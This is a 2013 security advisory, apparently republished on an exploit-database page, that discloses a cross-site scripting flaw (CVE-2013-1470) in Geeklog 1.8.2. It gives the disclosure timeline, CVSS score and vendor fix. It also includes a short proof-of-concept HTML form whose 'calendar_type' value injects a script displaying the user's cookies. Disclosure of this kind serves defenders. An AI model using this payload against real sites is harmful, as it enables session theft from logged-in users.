Lucene search

K
zdtHigh-Tech Bridge1337DAY-ID-20460
HistoryMar 01, 2013 - 12:00 a.m.

Geeklog 1.8.2 Cross Site Scripting Vulnerability

2013-03-0100:00:00
High-Tech Bridge
0day.today
34

0.003 Low

EPSS

Percentile

66.7%

Geeklog version 1.8.2 suffers from a cross site scripting vulnerability.

Product: Geeklog 
Vendor: http://www.geeklog.net
Vulnerable Version(s): 1.8.2 and probably prior
Tested Version: 1.8.2
Vendor Notification: February 6, 2013 
Vendor Patch: February 20, 2013 
Public Disclosure: February 27, 2013 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2013-1470
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in Geeklog that can be exploited to perform Cross-Site Scripting (XSS) attacks.


1) Cross-Site Scripting (XSS) in Geeklog: CVE-2013-1470

The vulnerability exists due to insufficient filtration of user-supplied data in "calendar_type" HTTP POST parameter passed to "/calendar/index.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in his browser in context of the vulnerable website.

The exploitation example below uses the "alert()" JavaScript function to display user's cookies: 


<form action="http://[host]/submit.php?type=calendar" method="post">
<input type="hidden" name="mode" value="Submit">  
<input type="hidden" name="calendar_type" value='"><script>alert(document.cookie);</script>'>
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Geeklog 1.8.2sr1

More Information:
http://www.geeklog.net/article.php/geeklog-1.8.2sr1

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23143 - https://www.htbridge.com/advisory/HTB23143 - Cross-Site Scripting (XSS) in Geeklog.
[2] Geeklog - http://www.geeklog.net/ - Geeklog is an open source application for managing dynamic web content. It is written in PHP and supports MySQL, PostgreSQL, or MS SQL as the database backend.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

#  0day.today [2018-01-01]  #

0.003 Low

EPSS

Percentile

66.7%